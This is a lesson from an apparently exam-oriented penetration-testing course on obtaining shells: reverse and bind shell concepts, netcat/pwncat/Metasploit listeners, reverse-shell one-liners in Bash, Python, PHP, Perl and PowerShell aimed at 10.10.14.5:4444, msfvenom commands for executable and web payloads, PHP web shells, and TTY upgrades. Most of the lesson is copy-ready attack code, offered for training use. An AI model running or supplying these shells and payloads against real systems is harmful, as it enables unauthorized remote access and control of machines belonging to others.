Nerd Level Tech logo
|
Lesson 10 of 24

Vulnerability Analysis & Exploitation

Shells, Payloads & Listeners

5 min read

Getting a shell on a target system is your primary goal. This lesson covers the different types of shells and how to create them.

Shell Types Overview

Reverse Shell:
Target ────────────────→ Attacker
(Target initiates connection to you)
Best for: Bypassing firewalls

Bind Shell:
Attacker ────────────────→ Target
(Target opens port, you connect)
Best for: Direct network access

Web Shell:
Attacker ────HTTP────→ Target
(Commands via web interface)
Best for: Persistence, restricted environments

Setting Up Listeners

Netcat Listener (Basic)

# Basic listener
nc -lvnp 4444

# With verbose output
nc -lvnp 4444 -v
Flag Purpose
-l Listen mode
-v Verbose
-n No DNS resolution
-p Port number

Rlwrap (Improved Shell)

# Better interactive shell with line editing
rlwrap nc -lvnp 4444

Pwncat (Advanced)

# Feature-rich handler
pwncat-cs -lp 4444

Reverse Shell Commands

One-Liners by Language

Bash:

bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

Bash (alternative):

bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Python3:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

PHP:

php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl:

perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PowerShell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Generating Payloads with Msfvenom

Common Payloads

Linux Reverse Shell:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

Windows Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

Windows Meterpreter (use only once in exam):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o meterpreter.exe

Web Payloads

PHP:

msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw > shell.php

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp

WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war > shell.war

ASP:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp > shell.asp

Msfvenom Format Reference

Flag Purpose
-p Payload to use
-f Output format
-o Output file
-e Encoder
-b Bad characters
LHOST Your IP
LPORT Your port

Upgrading Shells

Python PTY Upgrade

# On target after getting shell
python -c 'import pty; pty.spawn("/bin/bash")'
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Full TTY Upgrade

# Step 1: Spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2: Background shell
Ctrl+Z

# Step 3: Set terminal
stty raw -echo; fg

# Step 4: Set environment
export TERM=xterm
export SHELL=/bin/bash

Script Method

script /dev/null -c bash

Web Shells

Simple PHP Web Shell

<?php system($_GET['cmd']); ?>

Usage: http://target/shell.php?cmd=whoami

Interactive PHP Shell

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

Common Web Shell Locations

Kali Linux:
/usr/share/webshells/
├── php/
│   ├── php-reverse-shell.php
│   └── simple-backdoor.php
├── asp/
└── jsp/

Listener Cheat Sheet

# Netcat
nc -lvnp 4444

# Netcat with rlwrap
rlwrap nc -lvnp 4444

# Socat
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

# Metasploit handler
msfconsole -q
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run

Next, we'll cover file transfer techniques to move exploits and tools to target systems. :::

Quiz

Module 3: Vulnerability Analysis & Exploitation

Take Quiz